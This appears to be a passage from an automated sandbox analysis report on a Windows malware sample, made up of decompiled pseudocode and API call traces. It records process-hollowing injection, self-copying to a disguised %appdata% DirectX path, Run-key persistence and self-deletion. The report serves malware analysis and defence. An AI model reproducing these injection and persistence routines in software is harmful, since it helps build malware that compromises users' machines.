    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}








    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}














    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd

    Execution Graph

    Execution Coverage:2.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:45.8%
    Total number of Nodes:24
    Total number of Limit Nodes:5

    Graph


    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0029E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0029E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0029E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0029E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0029E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0029E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0029E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0029E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0029E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0029E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0029E35A
    Memory Dump Source
    • Source File: 00000003.00000002.1468917605.0029D000.00000040.sdmp, Offset: 0029D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_29d000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0029E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0029E4B6
      • Part of subcall function 0029E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0029E0C6
      • Part of subcall function 0029E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0029E0DC
      • Part of subcall function 0029E080: CreateProcessA.KERNEL32(?,00000000), ref: 0029E1C2
      • Part of subcall function 0029E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0029E1F0
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1468917605.0029D000.00000040.sdmp, Offset: 0029D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_29d000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0029E54C
      • Part of subcall function 0029E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0029E493
      • Part of subcall function 0029E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0029E4B6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1468917605.0029D000.00000040.sdmp, Offset: 0029D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_29d000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 00000003.00000002.1468917605.0029D000.00000040.sdmp, Offset: 0029D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_29d000_obtG43AWHP.jbxd

    Execution Graph

    Execution Coverage:2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:5%
    Total number of Nodes:622
    Total number of Limit Nodes:8

    Graph

14041->14043 14044 403eac 11 API calls 14043->14044 14045 418388 14044->14045 14045->14030 14046 41833c 14046->14039 14047 4182b8 14047->14039 14047->14046 14048 406d84 25 API calls 14047->14048 14060 407660 14047->14060 14064 417d2c 14047->14064 14048->14047 14051 406d92 14050->14051 14052 404478 25 API calls 14051->14052 14053 406d9d 14052->14053 14054 417cec 14053->14054 14067 417a70 14054->14067 14057 417d0c 14058 417a70 17 API calls 14057->14058 14059 417d17 14058->14059 14059->14047 14061 407673 14060->14061 14062 4043a8 25 API calls 14061->14062 14063 407685 14062->14063 14063->14047 14065 417a70 17 API calls 14064->14065 14066 417d37 14065->14066 14066->14047 14068 417a7f GetModuleHandleA 14067->14068 14070 417bb4 14067->14070 14069 417a94 16 API calls 14068->14069 14068->14070 14069->14070 14070->14057 14074 4183ec 14071->14074 14073 41856a 14073->13444 14073->13445 14075 417cec 17 API calls 14074->14075 14076 418405 14075->14076 14077 417d0c 17 API calls 14076->14077 14078 418417 14077->14078 14079 41843c CloseHandle 14078->14079 14080 418425 14078->14080 14081 417d2c 17 API calls 14078->14081 14079->14073 14080->14079 14081->14078 14082 417974 WSAStartup 14083 417987 14082->14083 14085 417998 14082->14085 14086 40a56c 14083->14086 14087 40a573 14086->14087 14088 403edc 25 API calls 14087->14088 14089 40a58b 14088->14089 14089->14085

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}


























    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}














    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
